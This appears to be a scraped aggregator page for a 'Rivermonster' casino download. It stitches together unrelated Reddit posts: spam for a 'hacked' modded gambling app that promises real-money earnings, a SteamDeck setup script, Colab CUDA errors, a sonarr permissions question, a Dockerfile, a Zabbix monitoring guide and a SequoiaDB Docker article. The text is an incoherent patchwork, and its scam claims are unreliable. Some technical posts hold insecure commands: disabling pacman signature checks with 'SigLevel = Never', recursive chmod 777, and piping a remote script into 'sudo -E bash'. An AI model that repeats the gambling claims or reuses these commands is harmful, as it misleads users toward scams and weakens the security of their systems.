Rivermonster rm.777.net download

Free Books

2008.06.15 05:34 Free Books

A subreddit to post and request links to free books.

2015.03.28 18:22 EjectaFizzy Tokyo 7th Sisters!

/Tokyo7thSisters is a subreddit dedicated to the mobile rhythm/idol raising game, Tokyo 7th Sisters (T7S), developed by Donuts. Will you continue to support the girls at Studio 777 in a future where idols are going out of style?

2014.01.22 23:10 elusivepuck Home of the Gayfish

The place to be for all your Coinye needs and Gayfish shenanigans!

2023.05.02 11:48 rivermonster_game DOWNLOAD RIVERMONSTER APK!

Attention all gaming enthusiasts! 🎮👀
Have you heard about the latest game sensation taking the world by storm? 🌎🌪️
Look no further than Rivermonster APK - the ultimate gaming experience that will keep you hooked for hours on end! 🤩🎉
With stunning graphics, exciting challenges, and endless fun, Rivermonster is the game you've been waiting for! 💥💯
Download the APK now and join the action! 📲🕹️
submitted by rivermonster_game to u/rivermonster_game [link] [comments]

2023.03.30 19:06 Charming_Netapp River Monster Mod 55K Money iOS and Android 2023

River Monster Mod 55K Money iOS and Android 2023


Here you can download and install the River Monster App to get the latest version of the official River Monster online casino software on mobile devices for free. The River Monster Casino Apk is available via the direct download link below. Follow the instructions in our step-by-step guide on how to properly set up the hacked, ad-free River Monster Gambling App using the River Monster app for Android, which lets you play a variety of River Monster games and sweepstakes today!
Simply click on the link below to download the River Monster App with a fully working +obb/data file on your Android device, or run the River Monster app for iPhone if you're an iOS user, and start playing the latest casino games with attractive visuals and smooth gameplay in the online games provider app.

With the rivermonster.net download for Android and iPhone, you can earn real money and add cash to your River Monster app account just by completing simple tasks and playing entertaining mod apk games on your portable device.
After finishing River Monster Casino sign-up and depositing River Monster 777 net free cash, you can proceed to play exclusive jackpot, card, slot, online casino, roulette, and fish games, plus in-game tournaments.
submitted by Charming_Netapp to techstufflounge [link] [comments]

2023.03.16 03:13 UriEl_M Getting SteamDeck ready for office and gaming use after update/install

Hey everyone, so I use my SteamDeck for everything from office work to gaming. To do that I have to run some scripts and install packages so the SteamDeck works with things like my printers (an HP LaserJet and a thermal label printer), connects to my phone via USB to move files, and supports other services I use.
I made an easy list to help me do that. A lot of it is automatic, and some of it requires manual edits because I'm uninformed in how to script some things; some packages are already pre-downloaded (from the AUR, normally). I'm hoping this list will help others make full use of their SteamDeck:

#get system ready after update install

# add # to beginning of ld.so.preload in /etc/

sudo steamos-readonly disable

sudo timedatectl set-timezone America/Chicago
sudo timedatectl set-ntp true

# append via tee: a plain "sudo echo ... >>" would be redirected by the non-root shell,
# and loosening gpg.conf to 777 isn't needed this way
echo "keyserver hkps://keyserver.ubuntu.com" | sudo tee -a /etc/pacman.d/gnupg/gpg.conf
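When appending to root-owned config files like gpg.conf from a script, tee is the reliable tool, because shell redirection runs with the caller's privileges rather than sudo's. A quick demo on a throwaway file (the path and the second keyserver option are just examples, not from the original script):

```shell
# create a file we own, then append a second line the tee way;
# against a root-owned file, only the tee form would succeed under sudo
echo "keyserver hkps://keyserver.ubuntu.com" > /tmp/gpg-demo.conf
echo "keyserver-options auto-key-retrieve" | tee -a /tmp/gpg-demo.conf > /dev/null
cat /tmp/gpg-demo.conf
```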

sudo pacman-key --init
sudo pacman-key --refresh-keys
sudo pacman-key --populate
sudo pacman -Sy archlinux-keyring
sudo pacman -Su

# set all SigLevel = Never in /etc/pacman.conf fixes corrupt packages

sudo pacman -S --overwrite \* base-devel
sudo pacman -S --overwrite \* glibc
sudo pacman -S firefox
sudo pacman -S --overwrite \* --needed base-devel

sudo rm -R /var/lib/pacman/sync
sudo pacman -Sy

cd /home/deck/aur
sudo chmod -R 777 /home/deck/aur

cd /home/deck/aur/yay
sudo pacman -U yay-11.3.0-1-x86_64.pkg.tar.zst
cd /home/deck/aur/expressvpn
sudo pacman -U --overwrite \* expressvpn-
cd /home/deck/aur/expressvpn-gui
sudo pacman -U --overwrite \* expressvpn-gui-0.6.9-1-x86_64.pkg.tar.zst

#add custom.db file into /var/cache/pacman/custom/
#edit out custom.db in /etc/pacman.conf

#install printer service

sudo pacman -S --overwrite \* cups
sudo systemctl enable --now cups
sudo pacman -S --overwrite \* system-config-printer
sudo pacman -S --overwrite \* gtk3-print-backends
sudo pacman -S --overwrite \* hplip

#install thermal printer, still need to link ppd downloads/printer...

sudo cp "/home/deck/Downloads/printer/LP320 LabelRangePrinter Linux Driver software/ubuntu_LP320_driver_x64/driver/rastertoLP320" /lib/cups/filter/rastertoLP320

#install phone driver
cd /home/deck/aur/samsung-unified-driver
sudo pacman -U --overwrite \* samsung-unified-driver*
sudo pacman -S --overwrite \* mtpfs
sudo pacman -S --overwrite \* gvfs-mtp
sudo pacman -S --overwrite \* gvfs-gphoto2
cd /home/deck/aur/jmtpfs/
sudo pacman -U --overwrite \* jmtpfs-0.5-1-x86_64.pkg.tar.xz

#fix linux limits api for packages/builds

sudo mkdir /usr/include/linux
sudo cp /usr/include/limits.h /usr/include/linux/limits.h

#install ifconfig for net commands

sudo pacman -S --overwrite \* net-tools

#auto change mtu at startup to 1420

sudo cp /home/deck/Desktop/scripts/mtuchange.sh /usr/bin/
sudo chmod 755 /usr/bin/mtuchange.sh

sudo cp /home/deck/Desktop/scripts/mtuchange.service /etc/systemd/system/
sudo systemctl enable mtuchange.service
sudo systemctl start mtuchange.service
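The mtuchange.sh script and mtuchange.service unit copied above aren't included in the post; a minimal sketch of the pair follows. The interface name wlan0 and the file contents are assumptions, not taken from the original script:

```
# /usr/bin/mtuchange.sh (hypothetical contents)
#!/bin/bash
ip link set dev wlan0 mtu 1420

# /etc/systemd/system/mtuchange.service (hypothetical contents)
[Unit]
Description=Set Wi-Fi MTU to 1420 at boot
After=network.target

[Service]
Type=oneshot
ExecStart=/usr/bin/mtuchange.sh

[Install]
WantedBy=multi-user.target
```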


sudo pacman -S linux-neptune-headers

sudo pacman-key --recv-key FBA220DFC880C036 --keyserver keyserver.ubuntu.com

sudo pacman-key --lsign-key FBA220DFC880C036

sudo pacman -U 'https://cdn-mirror.chaotic.cx/chaotic-aur/chaotic-keyring.pkg.tar.zst' 'https://cdn-mirror.chaotic.cx/chaotic-aur/chaotic-mirrorlist.pkg.tar.zst'

#Append (adding to the end of the file) to /etc/pacman.conf:

Include = /etc/pacman.d/chaotic-mirrorlist

sudo pacman -Syu

#fix errno error for YAY

sudo cp /usr/include/errno.h /usr/include/linux/


submitted by UriEl_M to SteamDeck [link] [comments]

2022.06.14 17:45 telesritchie Fish Tables

Real money fish game is a digital version of the fish arcade game that you play in parlors. The main difference here is that you can access these games without leaving your house, and they are available on both mobile and desktop devices. Besides that, you might also end up winning more cash prizes in online versions as they have some lucrative bonus offers. Fish tables generally come from China, and initially, big casino software providers started to develop online versions of the game.
It is a fun and exciting experience to enjoy some high-quality fish tables online. You might as well download the blue dragon app to do so. In this app, you can find a variety of fish table games as well as other online casino game genres like poker, blackjack, and slot machines. So, if you want to experience the thrill of playing fish tables, look no further than Blue Dragon.
If you do not want to download the app and want to instantly access these games, you might as well check out platforms like Rivermonster games or Fire Kirin that offer fish table games online. Depending on your choice, you can find legitimate real money fish game titles and enjoy them right away.
More info: https://blue-dragon.games/why-do-you-need-to-play-a-real-money-fish-game/
submitted by telesritchie to u/telesritchie [link] [comments]

2022.05.26 13:50 telesritchie Fish Table Gambling Game Online

Fish Table Gambling Game Online
Real money fish game is a digital version of the fish arcade game that you play in parlors. The main difference here is that you can access these games without leaving your house, and they are available on both mobile and desktop devices. Besides that, you might also end up winning more cash prizes in online versions as they have some lucrative bonus offers. Fish tables generally come from China, and initially, big casino software providers started to develop online versions of the game.
If you do not want to download the app and want to instantly access these games, you might as well check out platforms like Rivermonster games or Fire Kirin that offer fish table gambling games online. Depending on your choice, you can find legitimate real money fish game titles and enjoy them right away.
The rules of the real money fish game are very simple. Regardless of your prior experience in the fish arcade genre, you can learn and apply them easily as you start playing. You need to know the components of the game before starting: there is a fish aquarium with a number of fish in it, and on the main screen there are cannons below the fish tank.
More info: https://blue-dragon.games/why-do-you-need-to-play-a-real-money-fish-game/
submitted by telesritchie to u/telesritchie [link] [comments]

2022.05.04 13:39 Substantial_Leg4738 River Monsters 777

River Monsters 777
If you want to play and earn money, you can go to a casino and gamble. You can win a lot there and, depending on your luck, lose a lot too. But since most people stay at home today because of the pandemic, we can't go to the casino. So if you miss casino gambling, just download the River Monsters 777 Apk and play online casino games safely! The application has an assortment of fish games and online slot casinos for you to enjoy.

More Info: https://bitbetwin.az/rivermonste
submitted by Substantial_Leg4738 to u/Substantial_Leg4738 [link] [comments]

2022.03.13 00:19 janissary2016 PyTorch causing problems with CUDA on Colab

I am trying to implement a face extraction model using Colab. For that, I am removing Colab's CUDA to install 10-2 and I'm also installing Anaconda. This is the entirety:
import condacolab, torch, sys, skimage, matplotlib, imageio, plotly, cv2, black, flake8, facenet_pytorch
from google.colab import drive
drive.mount('/content/gdrive')
!git clone https://github.com/Chinmayrane16/ReconNet-PyTorch
!cp /content/gdrive/MyDrive/headsegmentation_final2.zip /content/gdrive/MyDrive/3DMM-Fitting-Pytorch.zip /content/
!cp /content/gdrive/MyDrive/Anaconda3.sh .
!unzip -qq /content/3DMM-Fitting-Pytorch.zip
!unzip -qq /content/ReconNet-PyTorch/images/all\ images/BSDS200.zip
!mv /content/ReconNet-PyTorch/*.py /content/
!mkdir results
!apt-get update -y
!apt-get --purge remove "*cublas*" "cuda*" "nsight*"
!wget https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-ubuntu1804.pin
!mv cuda-ubuntu1804.pin /etc/apt/preferences.d/cuda-repository-pin-600
!wget https://developer.download.nvidia.com/compute/cuda/10.2/Prod/local_installers/cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb
!dpkg -i cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb
!apt-key add /var/cuda-repo-10-2-local-10.2.89-440.33.01/7fa2af80.pub
!apt-get install cuda-10-2 libtorch -y
!apt autoremove -y
!chmod 777 Anaconda3.sh
!./Anaconda3.sh
condacolab.install()
!conda update conda
!conda create -n pytorch3d python=3.9
!conda activate pytorch3d
!conda install -c pytorch pytorch=1.9.1 torchvision cudatoolkit=10.2
!conda install -c fvcore -c iopath -c conda-forge fvcore iopath
!conda install -c bottler nvidiacub
!conda install jupyter
!conda install pytorch3d -c pytorch3d
pyt_version_str = torch.__version__.split("+")[0].replace(".", "")
version_str = "".join([f"py3{sys.version_info.minor}_cu", torch.version.cuda.replace(".", ""), f"_pyt{pyt_version_str}"])
!pip3 install --no-index --no-cache-dir pytorch3d -f https://dl.fbaipublicfiles.com/pytorch3d/packaging/wheels/{version_str}/download.html
!export CUB_HOME=$PWD/cub-1.10.0
!pip3 install "git+https://github.com/facebookresearch/[email protected]"
!rm -rf sample_data/ *.sh *.run
And this is the error I get when I try to run a Python file..
/usr/local/lib/python3.7/site-packages/torchvision/io/image.py:11: UserWarning: Failed to load image Python extension: /usr/local/lib/python3.7/site-packages/torchvision/image.so: undefined symbol: _ZNK2at10TensorBase21__dispatch_contiguousEN3c1012MemoryFormatE
  warn(f"Failed to load image Python extension: {e}")
Traceback (most recent call last):
  File "fit_single_img.py", line 2, in <module>
    from core.options import ImageFittingOptions
  File "/content/3DMM-Fitting-Pytorch/core/__init__.py", line 1, in <module>
    from core.BFM09Model import BFM09ReconModel
  File "/content/3DMM-Fitting-Pytorch/core/BFM09Model.py", line 5, in <module>
    from core.BaseModel import BaseReconModel
  File "/content/3DMM-Fitting-Pytorch/core/BaseModel.py", line 5, in <module>
    from pytorch3d.renderer import (
  File "/usr/local/lib/python3.7/site-packages/pytorch3d/renderer/__init__.py", line 7, in <module>
    from .blending import (
  File "/usr/local/lib/python3.7/site-packages/pytorch3d/renderer/blending.py", line 11, in <module>
    from pytorch3d import _C
ImportError: libc10_cuda.so: cannot open shared object file: No such file or directory
Where am I going wrong?
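A side note on the version_str built in the notebook: the pip3 wheel URL is keyed by a tag combining the Python minor version, the CUDA version, and the torch version, so a mismatch there is a common source of exactly this kind of libc10_cuda.so error. A standalone sketch of that tag logic (the inputs are illustrative, not read from a live environment):

```python
def pytorch3d_wheel_tag(py_minor, cuda_version, torch_version):
    # mirrors the notebook's version_str: "py3{minor}_cu{cuda digits}_pyt{torch digits}"
    pyt = torch_version.split("+")[0].replace(".", "")
    return "py3{}_cu{}_pyt{}".format(py_minor, cuda_version.replace(".", ""), pyt)

# e.g. Python 3.7 + CUDA 10.2 + torch 1.9.1:
print(pytorch3d_wheel_tag(7, "10.2", "1.9.1"))  # -> py37_cu102_pyt191
```

If the tag computed here doesn't match the CUDA build torch actually reports (torch.version.cuda), the downloaded pytorch3d wheel will link against a CUDA runtime that isn't present.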
submitted by janissary2016 to CUDA [link] [comments]

2022.03.11 17:37 zemekisrobert100 Ultra Monster casino download

Ultra Monster casino download
Unbelievable news for players who can't get by without their favorite casino games! The latest fishing games and competitions are available in the Ultra Monster casino download. You can rest assured that these games will match your style of play and meet your needs.

If you love casino games but lack the time to play them regularly, then you are perfectly positioned. It is possible to play fish games anywhere, at any time, with Ultra Monster. Internet access isn't required if you don't have it.
More Info: https://rivermonster.net/
submitted by zemekisrobert100 to u/zemekisrobert100 [link] [comments]

2022.03.10 23:29 janissary2016 PyTorch causing problems with CUDA on Colab

I am trying to implement a face extraction model using Colab. For that, I am removing Colab's CUDA to install 10-2 and I'm also installing Anaconda. This is the entirety:
!pip3 install -q condacolab scikit-image matplotlib imageio plotly opencv-python black 'isort<5' flake8-bugbear flake8-comprehensions facenet-pytorch
import condacolab, torch, sys
from google.colab import drive
drive.mount('/content/gdrive')
!git clone https://github.com/Chinmayrane16/ReconNet-PyTorch
!cp /content/gdrive/MyDrive/headsegmentation_final2.zip /content/gdrive/MyDrive/3DMM-Fitting-Pytorch.zip /content/
!cp /content/gdrive/MyDrive/Anaconda3.sh .
!unzip -qq /content/3DMM-Fitting-Pytorch.zip
!unzip -qq /content/ReconNet-PyTorch/images/all\ images/BSDS200.zip
!mv /content/ReconNet-PyTorch/*.py /content/
!mkdir results
!apt-get update -y
!apt-get --purge remove "*cublas*" "cuda*" "nsight*"
!wget https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-ubuntu1804.pin
!mv cuda-ubuntu1804.pin /etc/apt/preferences.d/cuda-repository-pin-600
!wget https://developer.download.nvidia.com/compute/cuda/10.2/Prod/local_installers/cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb
!dpkg -i cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb
!apt-key add /var/cuda-repo-10-2-local-10.2.89-440.33.01/7fa2af80.pub
!apt-get -y install cuda-10-2
!chmod 777 Anaconda3.sh
!./Anaconda3.sh
!rm -rf sample_data/ Anaconda3-2021.11-Linux-x86_64.sh cuda_10.2.89_440.33.01_linux.run
condacolab.install()
!conda update conda
!conda create -n pytorch3d python=3.9
!conda activate pytorch3d
!conda install -c pytorch pytorch=1.9.1 torchvision cudatoolkit=10.2
!conda install -c fvcore -c iopath -c conda-forge fvcore iopath
!conda install -c bottler nvidiacub
!conda install jupyter
!conda install pytorch3d -c pytorch3d
pyt_version_str = torch.__version__.split("+")[0].replace(".", "")
version_str = "".join([f"py3{sys.version_info.minor}_cu", torch.version.cuda.replace(".", ""), f"_pyt{pyt_version_str}"])
!pip3 install --no-index --no-cache-dir pytorch3d -f https://dl.fbaipublicfiles.com/pytorch3d/packaging/wheels/{version_str}/download.html
!export CUB_HOME=$PWD/cub-1.10.0
!pip3 install "git+https://github.com/facebookresearch/[email protected]"
And this is the error I get when I try to run a Python file..
[Errno 2] No such file or directory: '3DMM-Fitting-Pytorch/'
/content/3DMM-Fitting-Pytorch
/usr/local/lib/python3.7/site-packages/torchvision/io/image.py:11: UserWarning: Failed to load image Python extension: /usr/local/lib/python3.7/site-packages/torchvision/image.so: undefined symbol: _ZNK2at10TensorBase21__dispatch_contiguousEN3c1012MemoryFormatE
  warn(f"Failed to load image Python extension: {e}")
Traceback (most recent call last):
  File "fit_single_img.py", line 2, in <module>
    from core.options import ImageFittingOptions
  File "/content/3DMM-Fitting-Pytorch/core/__init__.py", line 1, in <module>
    from core.BFM09Model import BFM09ReconModel
  File "/content/3DMM-Fitting-Pytorch/core/BFM09Model.py", line 5, in <module>
    from core.BaseModel import BaseReconModel
  File "/content/3DMM-Fitting-Pytorch/core/BaseModel.py", line 5, in <module>
    from pytorch3d.renderer import (
  File "/usr/local/lib/python3.7/site-packages/pytorch3d/renderer/__init__.py", line 7, in <module>
    from .blending import (
  File "/usr/local/lib/python3.7/site-packages/pytorch3d/renderer/blending.py", line 11, in <module>
    from pytorch3d import _C
ImportError: libc10_cuda.so: cannot open shared object file: No such file or directory
Where am I going wrong?
submitted by janissary2016 to CUDA [link] [comments]

2021.11.04 21:34 fellowsnaketeaser Permissions issue with sabnzbd and sonarr

I have got both services running successfully as systemd services, each under their respective user:group.
When sabnzbd finishes a download, it is placed in /var/lib/sabnzbd/Downloads/complete; sonarr is notified and moves the file to its own media folder.
If, and only if, I set the permissions of the sabnzbd complete folder to 777 does the move succeed. That is a security nightmare, especially for a folder that stuff is downloaded into from the internet.
755 is not enough (one should assume that sonarr tells the download client to delete the file, but apparently it tries to delete it on its own, creating a problem). To make things worse, sonarr actually copies the file over and over again, only to delete the copy once it perceives that it cannot delete the original file (or thinks it cannot).
So I try to set ACL to the sabnzbd complete folder. But these are ignored.
/v/l/sabnzbd> getfacl Downloads/complete/
# file: Downloads/complete/
# owner: sabnzbd
# group: sabnzbd
user::rwx
user:sonarr:rwx   <-- see, sonarr, you could!
group::r-x
mask::rwx
other::r-x
The service
● sonarr.service - Sonarr Service
     Loaded: loaded (/usr/lib/systemd/system/sonarr.service; enabled; vendor preset: disabled)
     Active: active (running) since Tue 2021-11-02 17:17:21 CET; 2 days ago
   Main PID: 2278 (mono)
      Tasks: 17 (limit: 9413)
     Memory: 1.4G
        CPU: 1h 15min 48.778s
     CGroup: /system.slice/sonarr.service
             └─2278 /usr/bin/mono --debug /usr/lib/sonarr/bin/Sonarr.exe -nobrowser -data=/var/lib/sonarr

Nov 04 21:04:44 darkstar sonarr[2278]: at System.IO.File.Delete (System.String path) [0x0000e] in /build/mono/src/mono/external/corefx/src/System.IO.FileSystem/src/System/IO/File.cs:107
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Mono.Disk.DiskProvider.TransferFilePatched (System.String source, System.String destination, System.Boolean overwrite, System.Boolean move) [0x00291] in M:\BuildAgent\work\637395>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Mono.Disk.DiskProvider.MoveFileInternal (System.String source, System.String destination) [0x00098] in M:\BuildAgent\work\63739567f01dbcc2\src\NzbDrone.Mono\Disk\DiskProvider.cs:>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Common.Disk.DiskProviderBase.MoveFile (System.String source, System.String destination, System.Boolean overwrite) [0x000e1] in M:\BuildAgent\work\63739567f01dbcc2\src\NzbDrone.Co>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Common.Disk.DiskTransferService.TryMoveFileVerified (System.String sourcePath, System.String targetPath, System.Int64 originalSize) [0x00047] in M:\BuildAgent\work\63739567f01dbc>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Common.Disk.DiskTransferService.TransferFile (System.String sourcePath, System.String targetPath, NzbDrone.Common.Disk.TransferMode mode, System.Boolean overwrite) [0x004b9] in M>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.EpisodeFileMovingService.TransferFile (NzbDrone.Core.MediaFiles.EpisodeFile episodeFile, NzbDrone.Core.Tv.Series series, System.Collections.Generic.List`1[T] epis>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.EpisodeFileMovingService.MoveEpisodeFile (NzbDrone.Core.MediaFiles.EpisodeFile episodeFile, NzbDrone.Core.Parser.Model.LocalEpisode localEpisode) [0x00046] in M:\>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.UpgradeMediaFileService.UpgradeEpisodeFile (NzbDrone.Core.MediaFiles.EpisodeFile episodeFile, NzbDrone.Core.Parser.Model.LocalEpisode localEpisode, System.Boolean>
Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.EpisodeImport.ImportApprovedEpisodes.Import (System.Collections.Generic.List`1[T] decisions, System.Boolean newDownload, NzbDrone.Core.Download.DownloadClientItem>
Now this:
[email protected] /v/l/sabnzbd> sudo -u sabnzbd -s
[email protected] ~> cd Downloads/complete/
[email protected] ~/D/complete> touch testfile
[email protected] ~/D/complete> exit
[email protected] /v/l/sabnzbd> sudo -u sonarr -s
[email protected] /v/l/sabnzbd> rm Downloads/complete/testfile
and the file is gone. So my guess is that .NET's System.IO.File.Delete, being a Windows-oriented implementation, checks only the basic Unix permissions and is too timid to even try the delete, where it actually could succeed thanks to the ACL.
How do you guys get around this?
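For what it's worth, one common way around this class of problem is to avoid relying on ACLs at all: put the sonarr user in the sabnzbd group, make the complete folder 775, and have sabnzbd create group-writable files by lowering its umask in a systemd override. This is a sketch under those assumptions (the drop-in path is hypothetical), not something tested against this exact setup:

```
# /etc/systemd/system/sabnzbd.service.d/override.conf (hypothetical path)
[Service]
UMask=0002
```

Then `sudo usermod -aG sabnzbd sonarr`, `sudo chmod -R 775 /var/lib/sabnzbd/Downloads/complete`, and `sudo systemctl daemon-reload && sudo systemctl restart sabnzbd sonarr` would complete the picture, since group write on both the files and the containing directory is what plain Unix permission checks look at.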
submitted by fellowsnaketeaser to sonarr [link] [comments]

2021.05.15 04:44 backtickbot https://np.reddit.com/r/docker/comments/nbsn7m/i_need_help_with_aspnetcore_net5_react_docker/gy6b5po/

I've made this updated dockerfile from the tutorial for the dotnet core react project.
It cost me about a night's worth of time. There were mainly two errors.
One error was: The command '/bin/sh -c apt-get install -y nodejs' returned a non-zero code: 100 and E: Unable to locate package nodejs. To solve this, I had to pipe the curl output into sudo -E bash - and also update the Node version.
Then there was another error: the image couldn't find curl or sudo, so I had to install curl and sudo first.
After that there was another error when running dotnet publish: npm ERR! Failed at the [email protected] build script. I didn't know why this error was being thrown, so my guess was that file permissions had something to do with it. So I added RUN sudo chmod -R 777 ClientApp, after which the publish worked.
There was also a build error on my PC when I ran dotnet build DotNetCoreReact.csproj -c Release -o /app/build directly in my console. To solve it I removed these lines from the project's .csproj file.
These are just the summary of what I had to do to solve what. I'm not sure whether or not they are the proper way and most optimized way to handle these. At least the image is building and container is working properly.
Here is the full dockerfile.
#See https://aka.ms/containerfastmode to understand how Visual Studio uses this Dockerfile to build your images for faster debugging.
FROM mcr.microsoft.com/dotnet/aspnet:5.0 AS base
WORKDIR /app
EXPOSE 80
EXPOSE 443
RUN apt-get update && apt-get -y install sudo && apt-get -y install curl
RUN curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -
RUN apt-get install -y nodejs

# FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster AS build
FROM mcr.microsoft.com/dotnet/sdk:5.0 AS build
# installing sudo, because we need it for nodejs
RUN apt-get update && apt-get -y install sudo && apt-get -y install curl
# installing nodejs
RUN curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -
RUN apt-get install -y nodejs
WORKDIR /src
COPY ["DotNetCoreReact.csproj", "/"]
RUN dotnet restore "/DotNetCoreReact.csproj"
COPY . .
WORKDIR "/src"
RUN sudo chmod -R 777 ClientApp
RUN dotnet build "DotNetCoreReact.csproj" -c Release -o /app/build

FROM build AS publish
RUN dotnet publish "DotNetCoreReact.csproj" -c Release -o /app/publish

FROM base AS final
WORKDIR /app
COPY --from=publish /app/publish .
ENTRYPOINT ["dotnet", "DotNetCoreReact.dll"]

# building the image
# sudo docker build -t reactdotnetimg .
# running the container
# sudo docker run -it --name=reactdotnet --rm -p8010:80 reactdotnetimg
submitted by backtickbot to backtickbot [link] [comments]

2021.02.11 02:32 Robynb1 Monitoring Internet Connectivity with Zabbix Part 1

Monitoring Internet Connectivity with Zabbix Part 1
Edit - Fixed typo

So recently I decided to monitor my internet connection. This is part one. The second part will be adding to Grafana.
I first started off by searching for existing templates in Zabbix Share
Unfortunately all of them were broken as far as I could tell. After poking around a bit I eventually settled on this one, since it was only half broken. So I set about rewriting most of the script and adding a connectivity check via ping.
You can download the script and template here
If you want to set this up yourself follow the instructions below.
  1. Install the SpeedTest CLI (note: speedtest.net has its own CLI which uses different switches; it will not work with this script.)

sudo apt-get install speedtest-cli 
  2. Run speedtest-cli
    [email protected]:/home/administrator# speedtest-cli
Retrieving speedtest.net configuration...
Testing from MY ISP (NNN.NNN.NNN.NNN)...
Retrieving speedtest.net server list...
Selecting best server based on ping...
Hosted by S&T Communications (Colby, KS) [2046.18 km]: 40.067 ms
Testing download speed................................................................................
Download: 262.24 Mbit/s
Testing upload speed......................................................................................................
Upload: 4.04 Mbit/s
if you get something similar to above great its working!
  3. Create a folder for the script to live in.
    sudo mkdir /etc/zabbix/script
  4. Give it permissions
    sudo chmod 777 /etc/zabbix/script
  5. Copy the script over. This can either be done from the command line or with a utility such as WinSCP
  6. Make the script executable
    sudo chmod +x /etc/zabbix/script/spd.sh
  7. Now that we have the script set up, we need to process the data it is getting back from speedtest-cli. In the case of my version of this script, it is using JSON. If jq is not already installed, run the command below.
    sudo apt-get install jq
  8. Next we need to be able to send the data to Zabbix. This will require installing zabbix_sender (note: zabbix_sender is not installed by default on monitored hosts.)
    sudo apt-get install zabbix-sender
  9. Now that we can send the data to Zabbix, we will need a template set up so Zabbix knows what to do with it. Sign into your Zabbix web admin, then click Configuration >> Templates

Click Import in the upper Right Hand corner
select the file to import
Then Click Import.
Next we will need to link it to the appropriate machine.

Click Hosts under Configuration
click the link for the device you setup the script on.
click the templates tab
click select
check speedtest
click select
confirm the linked templates then click update
  10. With the Zabbix template now set up, we can test the script.
    /bin/bash /etc/zabbix/script/spd.sh
you should have something similar to below
checking speedtest and report back to zabbix, please wait...
info from server: "processed: 8; failed: 0; total: 8; seconds spent: 0.000489"
sent: 8; skipped: 0; total: 8
[email protected]:/home/administrator#
If something shows failed check the above steps to see if you missed anything.
  11. Finally, we need to schedule a couple of tasks so this script runs.
to schedule a task you will need to run crontab
crontab -e 
If this is the first time it will prompt you to select an editor
no crontab for administrator - using an empty one
Select an editor. To change later, run 'select-editor'.
  1. /bin/nano        <---- easiest
  2. /usr/bin/vim.basic
  3. /usr/bin/vim.tiny
  4. /bin/ed
Choose 1-4 [1]:
Pick your editor. I used nano. Enter the following lines at the end of the file then save.
*/20 * * * * /bin/bash /etc/zabbix/script/spd.sh # runs every 20 minutes
0 3 * * * find /tmp/*.log -ctime +1 -exec rm {} \; # runs daily at 3 AM
If you don’t like the intervals I have set above, a good place to generate the cron timings is here.
  12. Finished
If everything worked, you should be getting data pushed to Zabbix every 20 minutes (:00, :20, :40 past each hour).
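As a sanity check before letting cron loose, the daily cleanup expression can be tried on dummy files first. This demo uses an example directory and -mtime instead of -ctime, since a file's modification time (unlike its change time) can be back-dated with touch:

```shell
mkdir -p /tmp/spd-demo
touch /tmp/spd-demo/old.log /tmp/spd-demo/new.log
touch -d '3 days ago' /tmp/spd-demo/old.log   # back-date one file
find /tmp/spd-demo -name '*.log' -mtime +1 -exec rm {} \;
ls /tmp/spd-demo                              # -> new.log
```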

link to this same post on my blog. Hiding since I don't want people downvoting thinking its blog spam. I don't care if you click it this is so people don't think I stole it.
submitted by Robynb1 to homelab [link] [comments]

2019.02.28 04:45 sequoiadb How to implement rapid deployment of SequoiaDB cluster with Docker

How to implement rapid deployment of SequoiaDB cluster with Docker

Container technology, represented by Docker and Rocket, is becoming more and more popular. It changes the way companies and users create, publish, and use distributed applications, and it will bring its value to the cloud computing industry in the next five years. The reasons for its attractiveness are as follows:

1) Resource Independence and Isolation

Resource isolation is the most basic requirement of cloud computing platforms. Docker limits the hardware resources and software running environment through Linux namespaces and cgroups, isolating each application from the others on the host machine so that they do not affect each other.

Different applications and services are “shipped” and “unshipped” with the container as the unit. Thousands of “containers” are arranged on the “container ship”; different companies' different types of “goods” (programs, components, operating environments, dependencies required to run applications) remain independent.

2) Environmental Consistency

The development engineer builds a docker image after finishing application development. Based on this image, the container is packed with its various “goods” (programs, components, operating environment, dependencies required to run the application). No matter where the container runs (development environment, test environment, or production environment), you can ensure that the “goods” in the container are exactly the same: no software package will be missing in the test environment, no environment variable will be forgotten in production, and the application will not run abnormally because development and production depend on different installed versions. This consistency comes from the fact that the “goods” are already sealed into the “container” at delivery, and each link in the chain transports this complete “container” without splitting and merging.

3) Lightweight

Compared to traditional virtualization technology (VMs), docker's performance loss on CPU, memory, disk IO, and network IO is at the same level as native, or sometimes even better. The rapid creation, start-up, and destruction of containers has also received a lot of praise.

4) Build Once, Run Everywhere

This feature has attracted many people. When “goods” (applications) are exchanged between “trucks”, “trains”, and “ships” (private clouds, public clouds, etc.), only the “docker container” conforming to standard specifications and handling modes needs to be migrated, which reduces the time-consuming and labor-intensive manual “loading and unloading” (bringing applications online and offline) and results in huge time and labor cost savings. This makes it possible for just a few operators in the future to run container clusters serving ultra-large-scale online applications, just as a few machine operators in the 1960s could unload a 10,000-class container ship in a few hours.

Container technology nowadays is also widely used in the database field. Its “Build Once, Run Everywhere” feature greatly reduces the time spent installing and configuring the database environment, because even for DBAs who have worked with databases for many years, installing and configuring a database environment is still seemingly simple but often complex work. Of course, the other advantages of container technology also apply well to databases.

As an excellent domestic distributed NewSQL database, SequoiaDB has been recognized by more and more users. Taking Docker as an example, this article focuses on how to quickly build a SequoiaDB image with a Dockerfile, and how to use containers to quickly build and start a SequoiaDB cluster for an application system.

